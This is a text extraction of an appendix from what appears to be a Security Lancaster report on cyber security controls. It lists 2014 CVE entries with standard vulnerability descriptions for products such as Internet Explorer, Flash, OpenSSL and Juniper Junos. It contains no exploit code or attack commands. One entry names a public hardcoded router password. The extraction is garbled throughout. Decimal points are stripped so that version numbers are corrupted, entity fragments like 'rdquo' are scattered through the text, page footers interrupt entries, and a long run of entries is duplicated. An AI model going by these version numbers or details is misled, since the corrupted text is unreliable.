CVE-2014-4631RSA Adaptive Authentication (On-Premise)6021 through 71 P3 when using devicebinding in a Challenge SOAP call orusing the RSA Adaptive AuthenticationIntegration Adapters with Out-of-BandPhone (Authentify) functionality conductspermanent device binding even whenauthentication fails which allows remoteattackers to bypass authentication
CVE-2014-5528The Appsflyer library for Android does notverify X509 certificates from SSL serverswhich allows man-in-the-middle attackersto spoof servers and obtain sensitiveinformation via a crafted certificate
CVE-2014-6040rdquoGNU C Library (aka glibc) before 220allows context-dependent attackers to causea denial of service (out-of-bounds readand crash) via a multibyte character valueof rdquordquo0xffffrdquordquo to the iconv function whenconverting (1) IBM933 (2) IBM935 (3)IBM937 (4) IBM939 or (5) IBM1364encoded data to UTF-8rdquo
CVE-2014-6105IBM Security Identity Manager 6x before6003 IF14 allows remote attackers toconduct clickjacking attacks via unspecifiedvectors
CVE-2014-6136IBM Security AppScan Standard 8x and 9xbefore 9011 FP1 supports unencryptedsessions which allows remote attackers toobtain sensitive information by sniffing thenetwork
CVE-2014-6164IBM WebSphere Application Server80x before 80010 and 85x before8554 allows remote attackers to spoofOpenID and OpenID Connect cookies andconsequently obtain sensitive informationvia a crafted URL
CVE-2014-6363rdquovbscriptdll in Microsoft VBScript 56through 58 as used with Internet Explorer6 through 11 and other products allowsremote attackers to execute arbitrarycode or cause a denial of service(memory corruption) via a crafted website aka rdquordquoVBScript Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6369rdquoMicrosoft Internet Explorer 9 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6378Juniper Junos 114 before R12-S4 121X44before D35 121X45 before D30 121X46before D25 121X47 before D10 122before R9 122X50 before D70 123 beforeR7 131 before R4 before S3 131X49before D55 131X50 before D30 132before R5 132X50 before D20 132X51before D26 and D30 132X52 before D15133 before R3 and 141 before R1 allowsremote attackers to cause a denial of service(router protocol daemon crash) via a craftedRSVP PATH message
CVE-2014-6487Unspecified vulnerability in the OracleIdentity Manager component in OracleFusion Middleware 11115 1111711121 and 11122 allows remoteauthenticated users to affect integrity viaunknown vectors related to End User SelfService
CVE-2014-7250The TCP stack in 43BSD Net2 as usedin FreeBSD 54 NetBSD possibly 20 andOpenBSD possibly 36 does not properlyimplement the session timer which allowsremote attackers to cause a denial of service(resource consumption) via crafted packets
CVE-2014-7927The SimplifiedLoweringDoLoadBufferfunction in compilersimplified-loweringccin Google V8 as used in Google Chromebefore 400221491 does not properlychoose an integer data type which allowsremote attackers to cause a denial ofservice (memory corruption) or possiblyhave unspecified other impact via craftedJavaScript code
CVE-2014-7945OpenJPEG before r2908 as used inPDFium in Google Chrome before400221491 allows remote attackersto cause a denial of service (out-of-boundsread) via a crafted PDF document relatedto j2kc jp2c and t2c
CVE-2014-8447Adobe Reader and Acrobat 10x before10113 and 11x before 11010 on Windows
and OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-8445 CVE-2014-8446 CVE-2014-8456CVE-2014-8458 CVE-2014-8459 CVE-2014-8461 and CVE-2014-9158
CVE-2014-8638The navigatorsendBeacon implementationin Mozilla Firefox before 350 FirefoxESR 31x before 314 Thunderbird before314 and SeaMonkey before 232 omitsthe CORS Origin header which allowsremote attackers to bypass intended CORSaccess-control checks and conduct cross-site request forgery (CSRF) attacks via acrafted web site
CVE-2014-8835rdquoThe xpc data get bytes function in libxpcin Apple OS X before 10102 does not verifythat a dictionaryrsquos Attributes key has thexpc data data type which allows attackersto execute arbitrary code by providing acrafted dictionary to sysmond related toan rdquordquoXPC type confusionrdquordquo issuerdquo
CVE-2014-9159Heap-based buffer overflow in AdobeReader and Acrobat 10x before 10113and 11x before 11010 on Windows andOS X allows attackers to execute arbitrarycode via unspecified vectors a differentvulnerability than CVE-2014-8457 and CVE-2014-8460
CVE-2014-9163Stack-based buffer overflow in Adobe FlashPlayer before 1300259 and 14x and 15xbefore 1500246 on Windows and OS Xand before 112202425 on Linux allowsattackers to execute arbitrary code viaunspecified vectors as exploited in the wildin December 2014
CVE-2014-9350rdquoTP-Link TL-WR740N 4 with firmware3170 Build 140520 3166 Build 130529and 3164 Build 130205 allows remoteattackers to cause a denial of service(httpd crash) via vectors involving ardquordquonewrdquordquo value in the isNew parameter toPingIframeRpmhtmrdquo
CVE-2014-9357Docker 132 allows remote attackers toexecute arbitrary code with root privilegesvia a crafted (1) image or (2) build in aDockerfile in an LZMA (xz) archive relatedto the chroot for archive extraction
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 26 of 28
Survey Responses
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 27 of 28
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 28 of 28
MySQL and MariaDB before 5535 allowsremote database servers to cause a denialof service (crash) and possibly executearbitrary code via a long server versionstring
CVE-2014-0035The SymmetricBinding in Apache CXFbefore 2613 and 27x before 2710when EncryptBeforeSigning is enabledand the UsernameToken policy is set toan EncryptedSupportingToken transmitsthe UsernameToken in cleartext whichallows remote attackers to obtain sensitiveinformation by sniffing the network
CVE-2014-0160The (1) TLS and (2) DTLSimplementations in OpenSSL 101 before101g do not properly handle HeartbeatExtension packets which allows remoteattackers to obtain sensitive informationfrom process memory via crafted packetsthat trigger a buffer over-read asdemonstrated by reading private keysrelated to d1 bothc and t1 libc aka theHeartbleed bug
CVE-2014-0207The cdf read short sector function in cdfcin file before 519 as used in the Fileinfocomponent in PHP before 5430 and 55xbefore 5514 allows remote attackers tocause a denial of service (assertion failureand application exit) via a crafted CDF file
CVE-2014-0259rdquoMicrosoft Word 2007 SP3 and OfficeCompatibility Pack SP3 allow remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted Office document aka rdquordquoWordMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-0266rdquoThe XMLHTTP ActiveX controls in XMLCore Services 30 in Microsoft WindowsXP SP2 and SP3 Windows Server 2003SP2 Windows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RT Goldand 81 allow remote attackers to bypass theSame Origin Policy via a web page that isvisited in Internet Explorer aka rdquordquoMSXMLInformation Disclosure Vulnerabilityrdquordquordquo
CVE-2014-0294rdquoMicrosoft Forefront Protection 2010for Exchange Server does not properlyparse e-mail content which might allowremote attackers to execute arbitrarycode via a crafted message aka rdquordquoRCEVulnerabilityrdquordquordquo
CVE-2014-0313rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-0321rdquo
CVE-2014-0354The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 100(BFQ6)C0has a hardcoded password of qweasdzxcfor an unspecified account which allowsremote attackers to obtain indexasp loginaccess via an HTTP request
CVE-2014-0362Cross-site scripting (XSS) vulnerability
on Google Search Appliance (GSA)devices before 7014G216 and 72 before720G114 when dynamic navigation isconfigured allows remote attackers to injectarbitrary web script or HTML via inputincluded in a SCRIPT element
CVE-2014-0433Unspecified vulnerability in the MySQLServer component in Oracle MySQL 5613and earlier allows remote attackers to affectavailability via unknown vectors related toThread Pooling
CVE-2014-0488rdquoAPT before 109 does not rdquordquoinvalidaterepository datardquordquo when moving from anunauthenticated to authenticated statewhich allows remote attackers to haveunspecified impact via crafted repositorydatardquo
CVE-2014-0493Adobe Reader and Acrobat 10x before1019 and 11x before 11006 on Windowsand Mac OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-0495
CVE-2014-0494Adobe Digital Editions 201 allowsattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via unspecified vectors
CVE-2014-0498Stack-based buffer overflow in AdobeFlash Player before 117700269 and118x through 120x before 120070on Windows and Mac OS X and before112202341 on Linux Adobe AIR before4001628 on Android Adobe AIR SDKbefore 4001628 and Adobe AIR SDK ampCompiler before 4001628 allows attackersto execute arbitrary code via unspecifiedvectors
CVE-2014-0515Buffer overflow in Adobe Flash Playerbefore 117700279 and 118x through130x before 1300206 on Windows andOS X and before 112202356 on Linuxallows remote attackers to execute arbitrarycode via unspecified vectors as exploitedin the wild in April 2014
CVE-2014-0533Cross-site scripting (XSS) vulnerability inAdobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allows remoteattackers to inject arbitrary web script orHTML via unspecified vectors a differentvulnerability than CVE-2014-0531 and CVE-2014-0532
CVE-2014-0536Adobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allow attackersto execute arbitrary code or cause a denial ofservice (memory corruption) via unspecifiedvectors
CVE-2014-0562rdquoCross-site scripting (XSS) vulnerability in
Adobe Reader and Acrobat 10x before10112 and 11x before 11009 on OS Xallows remote attackers to inject arbitraryweb script or HTML via unspecified vectorsaka rdquordquoUniversal XSS (UXSS)rdquordquordquo
CVE-2014-0577rdquoAdobe Flash Player before 1300252and 14x and 15x before 1500223 onWindows and OS X and before 112202418on Linux Adobe AIR before 1500356Adobe AIR SDK before 1500356 andAdobe AIR SDK amp Compiler before1500356 allow attackers to executearbitrary code by leveraging an unspecifiedrdquordquotype confusionrdquordquo a different vulnerabilitythan CVE-2014-0584 CVE-2014-0585CVE-2014-0586 and CVE-2014-0590rdquo
CVE-2014-0765Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along GotoCmd argument
CVE-2014-0767Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along AccessCode argument
CVE-2014-0783Stack-based buffer overflow inBKHOdeqexe in Yokogawa CENTUMCS 3000 R30950 and earlier allows remoteattackers to execute arbitrary code via acrafted TCP packet
CVE-2014-1330WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1342WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1349Use-after-free vulnerability in Safari inApple iOS before 712 allows remoteattackers to execute arbitrary code or causea denial of service (application crash) viaan invalid URL
CVE-2014-1356Heap-based buffer overflow in launchdin Apple iOS before 712 Apple OS Xbefore 1094 and Apple TV before 612allows attackers to execute arbitrary codevia a crafted application that sends IPCmessages
CVE-2014-1370The byte-swapping implementation incopyfile in Apple OS X before 1094 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsmemory access and application crash) via acrafted AppleDouble file in a ZIP archive
CVE-2014-1379Graphics Drivers in Apple OS X before1094 allows attackers to gain privilegesor cause a denial of service (NULL pointerdereference and system crash) via a 32-bit
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 23 of 28
executable file for a crafted application
CVE-2014-1382WebKit as used in Apple iOS before712 Apple Safari before 615 and 7xbefore 705 and Apple TV before 612allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption and application crash) via acrafted web site a different vulnerabilitythan other WebKit CVEs listed in APPLE-SA-2014-06-30-1 APPLE-SA-2014-06-30-3 and APPLE-SA-2014-06-30-4
CVE-2014-1466SQL injection vulnerability in CSP MySQLUser Manager 23 allows remote attackersto execute arbitrary SQL commands via thelogin field of the login page
CVE-2014-1472Multiple cross-site scripting (XSS)vulnerabilities in the Enterprise Managerin McAfee Vulnerability Manager (MVM)755 and earlier allow remote attackers toinject arbitrary web script or HTML viaunspecified vectors
CVE-2014-1477Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before270 Firefox ESR 24x before 243Thunderbird before 243 and SeaMonkeybefore 224 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1518Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before290 Firefox ESR 24x before 245Thunderbird before 245 and SeaMonkeybefore 226 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1563Use-after-free vulnerability in themozillaDOMSVGLengthGetTearOfffunction in Mozilla Firefox before 320Firefox ESR 31x before 311 andThunderbird 31x before 311 allows remoteattackers to execute arbitrary code orcause a denial of service (heap memorycorruption) via an SVG animation withDOM interaction that triggers incorrectcycle collection
CVE-2014-1565The mozilladomAudioEventTimelinefunction in the Web Audio APIimplementation in Mozilla Firefox before320 Firefox ESR 31x before 311 andThunderbird 31x before 311 does notproperly create audio timelines whichallows remote attackers to obtain sensitiveinformation from process memory or causea denial of service (out-of-bounds read) viacrafted API calls
CVE-2014-1586contentbasesrcnsDocumentcpp inMozilla Firefox before 330 Firefox ESR31x before 312 and Thunderbird 31xbefore 312 does not consider whetherWebRTC video sharing is occurring whichallows remote attackers to obtain sensitiveinformation from the local camera in certainIFRAME situations by maintaining a sessionafter the user temporarily navigates away
CVE-2014-1701
The GenerateFunction function inbindingsscriptscode generator v8pmin Blink as used in Google Chrome before3301750149 does not implement acertain cross-origin restriction for theEventTargetdispatchEvent functionwhich allows remote attackers to conductUniversal XSS (UXSS) attacks via vectorsinvolving events
CVE-2014-1740Multiple use-after-free vulnerabilities innetwebsocketswebsocket jobcc in theWebSockets implementation in GoogleChrome before 3401847137 allow remoteattackers to cause a denial of service orpossibly have unspecified other impact viavectors related to WebSocketJob deletion
CVE-2014-1744Integer overflow in the AudioInputRendererHostOnCreateStream functionin contentbrowserrendererhostmediaaudio input renderer hostccin Google Chrome before 3501916114allows remote attackers to cause a denial ofservice or possibly have unspecified otherimpact via vectors that trigger a largeshared-memory allocation
CVE-2014-1753rdquoMicrosoft Internet Explorer 6 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-1806rdquoThe NET Remoting implementation inMicrosoft NET Framework 11 SP120 SP2 35 351 4 45 and451 does not properly restrict memoryaccess which allows remote attackers toexecute arbitrary code via vectors involvingmalformed objects aka rdquordquoTypeFilterLevelVulnerabilityrdquordquordquo
CVE-2014-1808rdquoMicrosoft Office 2013 Gold SP1 RTand RT SP1 allows remote attackers toobtain sensitive token information via aweb site that sends a crafted responseduring opening of an Office document akardquordquoToken Reuse Vulnerabilityrdquordquordquo
CVE-2014-1811rdquoThe TCP implementation in MicrosoftWindows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RTGold and 81 allows remote attackers tocause a denial of service (non-paged poolmemory consumption and system hang) viamalformed data in the Options field of aTCP header aka rdquordquoTCP Denial of ServiceVulnerabilityrdquordquordquo
CVE-2014-1812rdquoThe Group Policy implementation inMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows7 SP1 Windows 8 Windows 81 andWindows Server 2012 Gold and R2 does notproperly handle distribution of passwordswhich allows remote authenticated users toobtain sensitive credential information andconsequently gain privileges by leveragingaccess to the SYSVOL share as exploited inthe wild in May 2014 aka rdquordquoGroup PolicyPreferences Password Elevation of PrivilegeVulnerabilityrdquordquordquo
CVE-2014-2014imapsync before 1584 when running withthe ndashtls option attempts a cleartext loginwhen a certificate verification failure occurswhich allows remote attackers to obtaincredentials by sniffing the network
CVE-2014-2103Cisco Intrusion Prevention System (IPS)Software allows remote attackers to cause adenial of service (MainApp process outage)via malformed SNMP packets aka Bug IDsCSCum52355 and CSCul49309
CVE-2014-2109The TCP Input module in Cisco IOS122 through 124 and 150 through 154when NAT is used allows remote attackersto cause a denial of service (memoryconsumption or device reload) via craftedTCP packets aka Bug IDs CSCuh33843and CSCuj41494
CVE-2014-2364Multiple stack-based buffer overflows inAdvantech WebAccess before 72 allowremote attackers to execute arbitrary codevia a long string in the (1) ProjectName(2) SetParameter (3) NodeName(4) CCDParameter (5) SetColor (6)AlarmImage (7) GetParameter (8)GetColor (9) ServerResponse (10)SetBaud or (11) IPAddress parameterto an ActiveX control in (a) webvactocx(b) dvsocx or (c) webdactocx
CVE-2014-2416Unspecified vulnerability in the OracleData Integrator component in OracleFusion Middleware 111130 allows remoteattackers to affect availability via unknownvectors related to Data Quality a differentvulnerability than CVE-2014-2407 CVE-2014-2415 CVE-2014-2417 and CVE-2014-2418
CVE-2014-2554OTRS 31x before 3121 32x before3216 and 33x before 336 allows remoteattackers to conduct clickjacking attacks viaan IFRAME element
CVE-2014-2643Unspecified vulnerability in HP SystemsInsight Manager (SIM) before 74 allowsremote authenticated users to gainprivileges via unknown vectors
CVE-2014-2742rdquoIsode M-Link before 160v7 does notproperly restrict the processing ofcompressed XML elements which allowsremote attackers to cause a denial of service(resource consumption) via a crafted XMPPstream aka an rdquordquoxmppbombrdquordquo attackrdquo
CVE-2014-2768rdquoMicrosoft Internet Explorer 6 through 8allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2773rdquo
CVE-2014-2789rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2795 CVE-2014-2798 andCVE-2014-2804rdquo
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 24 of 28
CVE-2014-2791rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted web site aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-2794rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2788rdquo
CVE-2014-2808rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2796 CVE-2014-2825CVE-2014-4050 CVE-2014-4055 and CVE-2014-4067rdquo
CVE-2014-2821rdquoMicrosoft Internet Explorer 8 and 9 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-3444The GetGUID function in codecsdmp4dllin RealNetworks RealPlayer 160351 andearlier allows remote attackers to executearbitrary code or cause a denial of service(write access violation and applicationcrash) via a malformed 3gp file
CVE-2014-3489libutilmiq-passwordrb in Red HatCloudForms 30 Management Engine(CFME) before 5242 uses a hard-codedsalt which makes it easier for remoteattackers to guess passwords via a bruteforce attack
CVE-2014-3507Memory leak in d1 bothc in the DTLSimplementation in OpenSSL 098 before098zb 100 before 100n and 101before 101i allows remote attackersto cause a denial of service (memoryconsumption) via zero-length DTLSfragments that trigger improper handling ofthe return value of a certain insert function
CVE-2014-3556rdquoThe STARTTLS implementation inmailngx mail smtp handlerc in the SMTPproxy in nginx 15x and 16x before 161and 17x before 174 does not properlyrestrict IO buffering which allows man-in-the-middle attackers to insert commandsinto encrypted SMTP sessions by sending acleartext command that is processed afterTLS is in place related to a rdquordquoplaintextcommand injectionrdquordquo attack a similar issueto CVE-2011-0411rdquo
CVE-2014-3580The mod dav svn Apache HTTPD servermodule in Apache Subversion 1x before1719 and 18x before 1811 allows remoteattackers to cause a denial of service (NULLpointer dereference and server crash) via aREPORT request for a resource that doesnot exist
CVE-2014-3814
The Juniper Networks NetScreen Firewalldevices with ScreenOS before 63r17 whenconfigured to use the internal DNS lookupclient allows remote attackers to cause adenial of service (crash and reboot) viaa sequence of malformed packets to thedevice IP
CVE-2014-3819Juniper Junos 114 before 114R12 121before 121R10 121X44 before 121X44-D35 121X45 before 121X45-D25121X46 before 121X46-D20 121X47before 121X47-D10 122 before 122R8123 before 123R7 131 before 131R4132 before 132R4 133 before 133R2and 141 before 141R1 when Auto-RP isenabled allows remote attackers to causea denial of service (RDP routing processcrash and restart) via a malformed PIMpacket
CVE-2014-3872Multiple SQL injection vulnerabilities inthe administration login page in D-LinkDAP-1350 (Rev A1) with firmware114 and earlier allow remote attackers toexecute arbitrary SQL commands via the(1) username or (2) password
CVE-2014-4044OpenAFS 168 does not properly clear thefields in the host structure which allowsremote attackers to cause a denial of service(uninitialized memory access and crash)via unspecified vectors related to TMAYrequests
CVE-2014-4079rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090 CVE-2014-4094CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4082rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4100rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4105rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memory
corruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4114rdquoMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and WindowsRT Gold and 81 allow remote attackersto execute arbitrary code via a craftedOLE object in an Office document asexploited in the wild with a rdquordquoSandwormrdquordquoattack in June through October 2014 akardquordquoWindows OLE Remote Code ExecutionVulnerabilityrdquordquordquo
CVE-2014-4127rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4130rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4132 and CVE-2014-4138rdquo
CVE-2014-4132rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4130 and CVE-2014-4138rdquo
CVE-2014-4133rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4137rdquo
CVE-2014-4141rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4481Integer overflow in CoreGraphics in AppleiOS before 813 Apple OS X before10102 and Apple TV before 703 allowsremote attackers to execute arbitrary codeor cause a denial of service (applicationcrash) via a crafted PDF document
CVE-2014-4617The do uncompress function ing10compressc in GnuPG 1x before1417 and 2x before 2024 allows context-dependent attackers to cause a denialof service (infinite loop) via malformedcompressed packets as demonstrated by
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 25 of 28
an a3 01 5b ff byte sequence
CVE-2014-4631RSA Adaptive Authentication (On-Premise)6021 through 71 P3 when using devicebinding in a Challenge SOAP call orusing the RSA Adaptive AuthenticationIntegration Adapters with Out-of-BandPhone (Authentify) functionality conductspermanent device binding even whenauthentication fails which allows remoteattackers to bypass authentication
CVE-2014-5528The Appsflyer library for Android does notverify X509 certificates from SSL serverswhich allows man-in-the-middle attackersto spoof servers and obtain sensitiveinformation via a crafted certificate
CVE-2014-6040rdquoGNU C Library (aka glibc) before 220allows context-dependent attackers to causea denial of service (out-of-bounds readand crash) via a multibyte character valueof rdquordquo0xffffrdquordquo to the iconv function whenconverting (1) IBM933 (2) IBM935 (3)IBM937 (4) IBM939 or (5) IBM1364encoded data to UTF-8rdquo
CVE-2014-6105IBM Security Identity Manager 6x before6003 IF14 allows remote attackers toconduct clickjacking attacks via unspecifiedvectors
CVE-2014-6136IBM Security AppScan Standard 8x and 9xbefore 9011 FP1 supports unencryptedsessions which allows remote attackers toobtain sensitive information by sniffing thenetwork
CVE-2014-6164IBM WebSphere Application Server80x before 80010 and 85x before8554 allows remote attackers to spoofOpenID and OpenID Connect cookies andconsequently obtain sensitive informationvia a crafted URL
CVE-2014-6363rdquovbscriptdll in Microsoft VBScript 56through 58 as used with Internet Explorer6 through 11 and other products allowsremote attackers to execute arbitrarycode or cause a denial of service(memory corruption) via a crafted website aka rdquordquoVBScript Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6369rdquoMicrosoft Internet Explorer 9 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6378Juniper Junos 114 before R12-S4 121X44before D35 121X45 before D30 121X46before D25 121X47 before D10 122before R9 122X50 before D70 123 beforeR7 131 before R4 before S3 131X49before D55 131X50 before D30 132before R5 132X50 before D20 132X51before D26 and D30 132X52 before D15133 before R3 and 141 before R1 allowsremote attackers to cause a denial of service(router protocol daemon crash) via a craftedRSVP PATH message
CVE-2014-6487Unspecified vulnerability in the OracleIdentity Manager component in OracleFusion Middleware 11115 1111711121 and 11122 allows remoteauthenticated users to affect integrity viaunknown vectors related to End User SelfService
CVE-2014-7250The TCP stack in 43BSD Net2 as usedin FreeBSD 54 NetBSD possibly 20 andOpenBSD possibly 36 does not properlyimplement the session timer which allowsremote attackers to cause a denial of service(resource consumption) via crafted packets
CVE-2014-7927The SimplifiedLoweringDoLoadBufferfunction in compilersimplified-loweringccin Google V8 as used in Google Chromebefore 400221491 does not properlychoose an integer data type which allowsremote attackers to cause a denial ofservice (memory corruption) or possiblyhave unspecified other impact via craftedJavaScript code
CVE-2014-7945OpenJPEG before r2908 as used inPDFium in Google Chrome before400221491 allows remote attackersto cause a denial of service (out-of-boundsread) via a crafted PDF document relatedto j2kc jp2c and t2c
CVE-2014-8447Adobe Reader and Acrobat 10x before10113 and 11x before 11010 on Windows
and OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-8445 CVE-2014-8446 CVE-2014-8456CVE-2014-8458 CVE-2014-8459 CVE-2014-8461 and CVE-2014-9158
CVE-2014-8638The navigatorsendBeacon implementationin Mozilla Firefox before 350 FirefoxESR 31x before 314 Thunderbird before314 and SeaMonkey before 232 omitsthe CORS Origin header which allowsremote attackers to bypass intended CORSaccess-control checks and conduct cross-site request forgery (CSRF) attacks via acrafted web site
CVE-2014-8835rdquoThe xpc data get bytes function in libxpcin Apple OS X before 10102 does not verifythat a dictionaryrsquos Attributes key has thexpc data data type which allows attackersto execute arbitrary code by providing acrafted dictionary to sysmond related toan rdquordquoXPC type confusionrdquordquo issuerdquo
CVE-2014-9159Heap-based buffer overflow in AdobeReader and Acrobat 10x before 10113and 11x before 11010 on Windows andOS X allows attackers to execute arbitrarycode via unspecified vectors a differentvulnerability than CVE-2014-8457 and CVE-2014-8460
CVE-2014-9163Stack-based buffer overflow in Adobe FlashPlayer before 1300259 and 14x and 15xbefore 1500246 on Windows and OS Xand before 112202425 on Linux allowsattackers to execute arbitrary code viaunspecified vectors as exploited in the wildin December 2014
CVE-2014-9350rdquoTP-Link TL-WR740N 4 with firmware3170 Build 140520 3166 Build 130529and 3164 Build 130205 allows remoteattackers to cause a denial of service(httpd crash) via vectors involving ardquordquonewrdquordquo value in the isNew parameter toPingIframeRpmhtmrdquo
